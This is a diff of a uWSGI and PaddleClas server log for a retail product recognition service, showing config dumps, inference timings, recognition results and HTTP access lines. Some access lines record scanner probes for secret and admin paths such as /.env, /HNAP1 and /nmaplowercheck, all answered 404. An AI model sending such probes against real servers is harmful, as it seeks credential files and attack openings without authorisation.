-2021-11-03 03:50:09 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:50:09 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:50:09 INFO: threshold : 0.2 -2021-11-03 03:50:09 INFO: use_fp16 : False -2021-11-03 03:50:09 INFO: use_gpu : False -2021-11-03 03:50:09 INFO: use_tensorrt : False -2021-11-03 03:50:09 INFO: IndexProcess : -2021-11-03 03:50:09 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:50:09 INFO: return_k : 5 -2021-11-03 03:50:09 INFO: score_thres : 0.5 -2021-11-03 03:50:09 INFO: RecPostProcess : None -2021-11-03 03:50:09 INFO: RecPreProcess : -2021-11-03 03:50:09 INFO: transform_ops : -2021-11-03 03:50:09 INFO: ResizeImage : -2021-11-03 03:50:09 INFO: size : 224 -2021-11-03 03:50:09 INFO: NormalizeImage : -2021-11-03 03:50:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:50:09 INFO: order : -2021-11-03 03:50:09 INFO: scale : 0.00392157 -2021-11-03 03:50:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:50:09 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2230.3977012634277 ms per batch image +2022-01-26 16:39:11 INFO: DetPostProcess : +2022-01-26 16:39:11 INFO: DetPreProcess : +2022-01-26 16:39:11 INFO: transform_ops : +2022-01-26 16:39:11 INFO: DetResize : +2022-01-26 16:39:11 INFO: interp : 2 +2022-01-26 16:39:11 INFO: keep_ratio : False +2022-01-26 16:39:11 INFO: target_size : [640, 640] +2022-01-26 16:39:11 INFO: DetNormalizeImage : +2022-01-26 16:39:11 INFO: is_scale : True +2022-01-26 16:39:11 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:39:11 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:39:11 INFO: DetPermute : +2022-01-26 16:39:11 INFO: Global : +2022-01-26 16:39:11 INFO: batch_size : 1 +2022-01-26 16:39:11 INFO: cpu_num_threads : 1 +2022-01-26 16:39:11 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 16:39:11 INFO: enable_benchmark : True +2022-01-26 16:39:11 INFO: enable_mkldnn : True +2022-01-26 16:39:11 INFO: enable_profile : False +2022-01-26 16:39:11 INFO: gpu_mem : 8000 +2022-01-26 16:39:11 INFO: image_shape : [3, 640, 640] +2022-01-26 16:39:11 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 16:39:11 INFO: ir_optim : True +2022-01-26 16:39:11 INFO: labe_list : ['foreground'] +2022-01-26 16:39:11 INFO: max_det_results : 5 +2022-01-26 16:39:11 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:39:11 INFO: rec_nms_thresold : 0.05 +2022-01-26 16:39:11 INFO: threshold : 0.2 +2022-01-26 16:39:11 INFO: use_fp16 : False +2022-01-26 16:39:11 INFO: use_gpu : False +2022-01-26 16:39:11 INFO: use_tensorrt : False +2022-01-26 16:39:11 INFO: IndexProcess : +2022-01-26 16:39:11 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:39:11 INFO: return_k : 5 +2022-01-26 16:39:11 INFO: score_thres : 0.5 +2022-01-26 16:39:11 INFO: RecPostProcess : None +2022-01-26 16:39:11 INFO: RecPreProcess : +2022-01-26 16:39:11 INFO: transform_ops : +2022-01-26 16:39:11 INFO: ResizeImage : +2022-01-26 16:39:11 INFO: size : 224 +2022-01-26 16:39:11 INFO: NormalizeImage : +2022-01-26 16:39:11 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:39:11 INFO: order : +2022-01-26 16:39:11 INFO: scale : 0.00392157 +2022-01-26 16:39:11 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:39:11 INFO: ToCHWImage : None +Inference: 375.63490867614746 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 4/8] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:50:08 2021] POST /reference_client/ => generated 98 bytes in 5760 msecs (HTTP/1.1 200) 5 headers in 157 bytes (9 switches on core 0) -[pid: 32766|app: 0|req: 4/9] 83.97.20.34 () {26 vars in 269 bytes} [Wed Nov 3 03:50:46 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) -req -2021-11-03 03:54:47 INFO: +[pid: 12458|app: 0|req: 2/17] 49.79.96.123 () {36 vars in 809 bytes} [Wed Jan 26 16:39:10 2022] POST /reference/ => generated 98 bytes in 2911 msecs (HTTP/1.1 200) 5 headers in 157 bytes (15 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Thu Jan 27 01:52:43 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x5607c50fd830 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x5607c50fd830 pid: 13118 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 13118) +spawned uWSGI worker 1 (pid: 13120, cores: 1) +spawned uWSGI worker 2 (pid: 13121, cores: 1) +spawned uWSGI worker 3 (pid: 13122, cores: 1) +spawned uWSGI worker 4 (pid: 13123, cores: 1) +spawned uWSGI worker 5 (pid: 13124, cores: 1) +spawned uWSGI worker 6 (pid: 13125, cores: 1) +spawned uWSGI worker 7 (pid: 13126, cores: 1) +spawned uWSGI worker 8 (pid: 13127, cores: 1) +spawned uWSGI worker 9 (pid: 13128, cores: 1) +spawned uWSGI worker 10 (pid: 13129, cores: 1) +spawned uWSGI http 1 (pid: 13130) +2022-01-26 17:53:28 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1718,75 +1164,899 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:54:47 INFO: DetPostProcess : -2021-11-03 03:54:47 INFO: DetPreProcess : -2021-11-03 03:54:47 INFO: transform_ops : -2021-11-03 03:54:47 INFO: DetResize : -2021-11-03 03:54:47 INFO: interp : 2 -2021-11-03 03:54:47 INFO: keep_ratio : False -2021-11-03 03:54:47 INFO: target_size : [640, 640] -2021-11-03 03:54:47 INFO: DetNormalizeImage : -2021-11-03 03:54:47 INFO: is_scale : True -2021-11-03 03:54:47 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:54:47 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:54:47 INFO: DetPermute : -2021-11-03 03:54:47 INFO: Global : -2021-11-03 03:54:47 INFO: batch_size : 1 -2021-11-03 03:54:47 INFO: cpu_num_threads : 10 -2021-11-03 03:54:47 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:54:47 INFO: enable_benchmark : True -2021-11-03 03:54:47 INFO: enable_mkldnn : True -2021-11-03 03:54:47 INFO: enable_profile : False -2021-11-03 03:54:47 INFO: gpu_mem : 8000 -2021-11-03 03:54:47 INFO: image_shape : [3, 640, 640] -2021-11-03 03:54:47 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:54:47 INFO: ir_optim : True -2021-11-03 03:54:47 INFO: labe_list : ['foreground'] -2021-11-03 03:54:47 INFO: max_det_results : 5 -2021-11-03 03:54:47 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:54:47 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:54:47 INFO: threshold : 0.2 -2021-11-03 03:54:47 INFO: use_fp16 : False -2021-11-03 03:54:47 INFO: use_gpu : False -2021-11-03 03:54:47 INFO: use_tensorrt : False -2021-11-03 03:54:47 INFO: IndexProcess : -2021-11-03 03:54:47 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:54:47 INFO: return_k : 5 -2021-11-03 03:54:47 INFO: score_thres : 0.5 -2021-11-03 03:54:47 INFO: RecPostProcess : None -2021-11-03 03:54:47 INFO: RecPreProcess : -2021-11-03 03:54:47 INFO: transform_ops : -2021-11-03 03:54:47 INFO: ResizeImage : -2021-11-03 03:54:47 INFO: size : 224 -2021-11-03 03:54:47 INFO: NormalizeImage : -2021-11-03 03:54:47 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:54:47 INFO: order : -2021-11-03 03:54:47 INFO: scale : 0.00392157 -2021-11-03 03:54:47 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:54:47 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2342.794895172119 ms per batch image +2022-01-26 17:53:28 INFO: DetPostProcess : +2022-01-26 17:53:28 INFO: DetPreProcess : +2022-01-26 17:53:28 INFO: transform_ops : +2022-01-26 17:53:28 INFO: DetResize : +2022-01-26 17:53:28 INFO: interp : 2 +2022-01-26 17:53:28 INFO: keep_ratio : False +2022-01-26 17:53:28 INFO: target_size : [640, 640] +2022-01-26 17:53:28 INFO: DetNormalizeImage : +2022-01-26 17:53:28 INFO: is_scale : True +2022-01-26 17:53:28 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 17:53:28 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 17:53:28 INFO: DetPermute : +2022-01-26 17:53:28 INFO: Global : +2022-01-26 17:53:28 INFO: batch_size : 1 +2022-01-26 17:53:28 INFO: cpu_num_threads : 1 +2022-01-26 17:53:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 17:53:28 INFO: enable_benchmark : True +2022-01-26 17:53:28 INFO: enable_mkldnn : True +2022-01-26 17:53:28 INFO: enable_profile : False +2022-01-26 17:53:28 INFO: gpu_mem : 8000 +2022-01-26 17:53:28 INFO: image_shape : [3, 640, 640] +2022-01-26 17:53:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 17:53:28 INFO: ir_optim : True +2022-01-26 17:53:28 INFO: labe_list : ['foreground'] +2022-01-26 17:53:28 INFO: max_det_results : 5 +2022-01-26 17:53:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 17:53:28 INFO: rec_nms_thresold : 0.05 +2022-01-26 17:53:28 INFO: threshold : 0.2 +2022-01-26 17:53:28 INFO: use_fp16 : False +2022-01-26 17:53:28 INFO: use_gpu : False +2022-01-26 17:53:28 INFO: use_tensorrt : False +2022-01-26 17:53:28 INFO: IndexProcess : +2022-01-26 17:53:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 17:53:28 INFO: return_k : 5 +2022-01-26 17:53:28 INFO: score_thres : 0.5 +2022-01-26 17:53:28 INFO: RecPostProcess : None +2022-01-26 17:53:28 INFO: RecPreProcess : +2022-01-26 17:53:28 INFO: transform_ops : +2022-01-26 17:53:28 INFO: ResizeImage : +2022-01-26 17:53:28 INFO: size : 224 +2022-01-26 17:53:28 INFO: NormalizeImage : +2022-01-26 17:53:28 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 17:53:28 INFO: order : +2022-01-26 17:53:28 INFO: scale : 0.00392157 +2022-01-26 17:53:28 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 17:53:28 INFO: ToCHWImage : None +Inference: 379.5459270477295 ms per batch image +[{'bbox': [0, 0, 733, 1440], 'rec_docs': 'kindle电子书阅读器', 'rec_scores': 0.84588814}] +{'bbox': [0, 0, 733, 1440], 'rec_docs': 'kindle电子书阅读器', 'rec_scores': 0.84588814} +234 +["{'bbox': [0, 0, 733, 1440], 'rec_docs': 'kindle电子书阅读器', 'rec_scores': 0.84588814}\n"] +['kindle电子书阅读器'] +['kindle电子书阅读器', '639'] +[pid: 13129|app: 0|req: 1/1] 49.79.96.123 () {36 vars in 810 bytes} [Wed Jan 26 17:53:27 2022] POST /reference/ => generated 134 bytes in 3225 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 2/2] 111.7.96.151 () {32 vars in 357 bytes} [Wed Jan 26 18:11:35 2022] GET / => generated 179 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 3/3] 36.99.136.128 () {46 vars in 791 bytes} [Wed Jan 26 18:11:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 4/4] 36.99.136.128 () {46 vars in 813 bytes} [Wed Jan 26 18:11:45 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 5/5] 2.57.122.9 () {30 vars in 436 bytes} [Wed Jan 26 18:19:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 6/6] 2.57.122.9 () {30 vars in 458 bytes} [Wed Jan 26 18:19:37 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 7/7] 2.57.122.9 () {34 vars in 474 bytes} [Wed Jan 26 18:19:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 8/8] 2.57.122.9 () {34 vars in 496 bytes} [Wed Jan 26 18:19:38 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 1/9] 106.75.84.37 () {26 vars in 282 bytes} [Wed Jan 26 18:28:48 2022] GET / => generated 179 bytes in 237 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 9/10] 120.52.152.20 () {34 vars in 572 bytes} [Wed Jan 26 18:29:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 10/11] 209.17.96.50 () {30 vars in 409 bytes} [Wed Jan 26 19:39:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 11/12] 2.57.121.59 () {34 vars in 400 bytes} [Wed Jan 26 20:05:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 12/13] 62.171.132.199 () {40 vars in 672 bytes} [Wed Jan 26 20:08:27 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 13/14] 39.103.164.38 () {32 vars in 513 bytes} [Wed Jan 26 20:11:18 2022] GET /nmaplowercheck1643227868 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 14/15] 39.103.164.38 () {32 vars in 485 bytes} [Wed Jan 26 20:11:18 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 15/16] 39.103.164.38 () {32 vars in 475 bytes} [Wed Jan 26 20:11:18 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 16/17] 39.103.164.38 () {34 vars in 501 bytes} [Wed Jan 26 20:11:20 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 17/18] 39.103.164.38 () {28 vars in 307 bytes} [Wed Jan 26 20:11:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 18/19] 83.97.20.34 () {30 vars in 329 bytes} [Wed Jan 26 20:12:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 19/20] 18.144.28.7 () {36 vars in 587 bytes} [Wed Jan 26 20:44:34 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 20/21] 18.144.28.7 () {40 vars in 694 bytes} [Wed Jan 26 20:44:34 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 21/22] 103.243.46.90 () {36 vars in 562 bytes} [Wed Jan 26 21:19:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 22/23] 117.50.6.160 () {30 vars in 327 bytes} [Wed Jan 26 21:31:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 23/24] 83.97.20.34 () {26 vars in 287 bytes} [Wed Jan 26 22:03:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 24/25] 217.75.202.90 () {32 vars in 464 bytes} [Wed Jan 26 22:36:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 25/26] 162.142.125.43 () {28 vars in 311 bytes} [Wed Jan 26 22:57:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 26/27] 162.142.125.43 () {34 vars in 443 bytes} [Wed Jan 26 22:57:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 27/28] 109.106.224.168 () {32 vars in 465 bytes} [Wed Jan 26 23:06:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 28/29] 47.92.102.179 () {34 vars in 459 bytes} [Wed Jan 26 23:36:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 2/30] 118.193.40.46 () {30 vars in 328 bytes} [Thu Jan 27 01:00:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 29/31] 183.136.225.56 () {34 vars in 535 bytes} [Thu Jan 27 01:06:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 30/32] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 01:44:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 31/33] 101.83.69.232 () {36 vars in 803 bytes} [Thu Jan 27 01:59:49 2022] POST /search/ => generated 20323 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 3/34] 101.83.69.232 () {36 vars in 799 bytes} [Thu Jan 27 01:59:57 2022] POST /find/ => generated 114 bytes in 15 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +2022-01-27 02:00:06 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:00:06 INFO: Global : +2022-01-27 02:00:06 INFO: batch_size : 32 +2022-01-27 02:00:06 INFO: cpu_num_threads : 1 +2022-01-27 02:00:06 INFO: enable_benchmark : True +2022-01-27 02:00:06 INFO: enable_mkldnn : True +2022-01-27 02:00:06 INFO: enable_profile : False +2022-01-27 02:00:06 INFO: gpu_mem : 8000 +2022-01-27 02:00:06 INFO: ir_optim : True +2022-01-27 02:00:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:00:06 INFO: use_fp16 : False +2022-01-27 02:00:06 INFO: use_gpu : False +2022-01-27 02:00:06 INFO: use_tensorrt : False +2022-01-27 02:00:06 INFO: IndexProcess : +2022-01-27 02:00:06 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-27 02:00:06 INFO: delimiter : +2022-01-27 02:00:06 INFO: dist_type : IP +2022-01-27 02:00:06 INFO: embedding_size : 512 +2022-01-27 02:00:06 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-27 02:00:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:00:06 INFO: index_method : HNSW32 +2022-01-27 02:00:06 INFO: index_operation : new +2022-01-27 02:00:06 INFO: RecPostProcess : None +2022-01-27 02:00:06 INFO: RecPreProcess : +2022-01-27 02:00:06 INFO: transform_ops : +2022-01-27 02:00:06 INFO: ResizeImage : +2022-01-27 02:00:06 INFO: size : 224 +2022-01-27 02:00:06 INFO: NormalizeImage : +2022-01-27 02:00:06 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:00:06 INFO: order : +2022-01-27 02:00:06 INFO: scale : 0.00392157 +2022-01-27 02:00:06 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:00:06 INFO: ToCHWImage : None + 0%| | 0/191 [00:00 generated 34 bytes in 7590 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +req +2022-01-27 02:01:09 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:01:09 INFO: DetPostProcess : +2022-01-27 02:01:09 INFO: DetPreProcess : +2022-01-27 02:01:09 INFO: transform_ops : +2022-01-27 02:01:09 INFO: DetResize : +2022-01-27 02:01:09 INFO: interp : 2 +2022-01-27 02:01:09 INFO: keep_ratio : False +2022-01-27 02:01:09 INFO: target_size : [640, 640] +2022-01-27 02:01:09 INFO: DetNormalizeImage : +2022-01-27 02:01:09 INFO: is_scale : True +2022-01-27 02:01:09 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:01:09 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:01:09 INFO: DetPermute : +2022-01-27 02:01:09 INFO: Global : +2022-01-27 02:01:09 INFO: batch_size : 1 +2022-01-27 02:01:09 INFO: cpu_num_threads : 1 +2022-01-27 02:01:09 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-27 02:01:09 INFO: enable_benchmark : True +2022-01-27 02:01:09 INFO: enable_mkldnn : True +2022-01-27 02:01:09 INFO: enable_profile : False +2022-01-27 02:01:09 INFO: gpu_mem : 8000 +2022-01-27 02:01:09 INFO: image_shape : [3, 640, 640] +2022-01-27 02:01:09 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-27 02:01:09 INFO: ir_optim : True +2022-01-27 02:01:09 INFO: labe_list : ['foreground'] +2022-01-27 02:01:09 INFO: max_det_results : 5 +2022-01-27 02:01:09 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:01:09 INFO: rec_nms_thresold : 0.05 +2022-01-27 02:01:09 INFO: threshold : 0.2 +2022-01-27 02:01:09 INFO: use_fp16 : False +2022-01-27 02:01:09 INFO: use_gpu : False +2022-01-27 02:01:09 INFO: use_tensorrt : False +2022-01-27 02:01:09 INFO: IndexProcess : +2022-01-27 02:01:09 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:01:09 INFO: return_k : 5 +2022-01-27 02:01:09 INFO: score_thres : 0.5 +2022-01-27 02:01:09 INFO: RecPostProcess : None +2022-01-27 02:01:09 INFO: RecPreProcess : +2022-01-27 02:01:09 INFO: transform_ops : +2022-01-27 02:01:09 INFO: ResizeImage : +2022-01-27 02:01:09 INFO: size : 224 +2022-01-27 02:01:09 INFO: NormalizeImage : +2022-01-27 02:01:09 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:01:09 INFO: order : +2022-01-27 02:01:09 INFO: scale : 0.00392157 +2022-01-27 02:01:09 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:01:09 INFO: ToCHWImage : None +Inference: 376.32250785827637 ms per batch image +[{'bbox': [225, 14, 448, 474], 'rec_docs': '小度充电宝', 'rec_scores': 0.7016185}] +{'bbox': [225, 14, 448, 474], 'rec_docs': '小度充电宝', 'rec_scores': 0.7016185} +234 +["{'bbox': [225, 14, 448, 474], 'rec_docs': '小度充电宝', 'rec_scores': 0.7016185}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13128|app: 0|req: 4/36] 49.79.96.123 () {34 vars in 446 bytes} [Thu Jan 27 02:01:08 2022] POST /reference_client/ => generated 126 bytes in 3050 msecs (HTTP/1.1 200) 5 headers in 158 bytes (17 switches on core 0) +2022-01-27 02:01:45 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:01:45 INFO: Global : +2022-01-27 02:01:45 INFO: batch_size : 32 +2022-01-27 02:01:45 INFO: cpu_num_threads : 1 +2022-01-27 02:01:45 INFO: enable_benchmark : True +2022-01-27 02:01:45 INFO: enable_mkldnn : True +2022-01-27 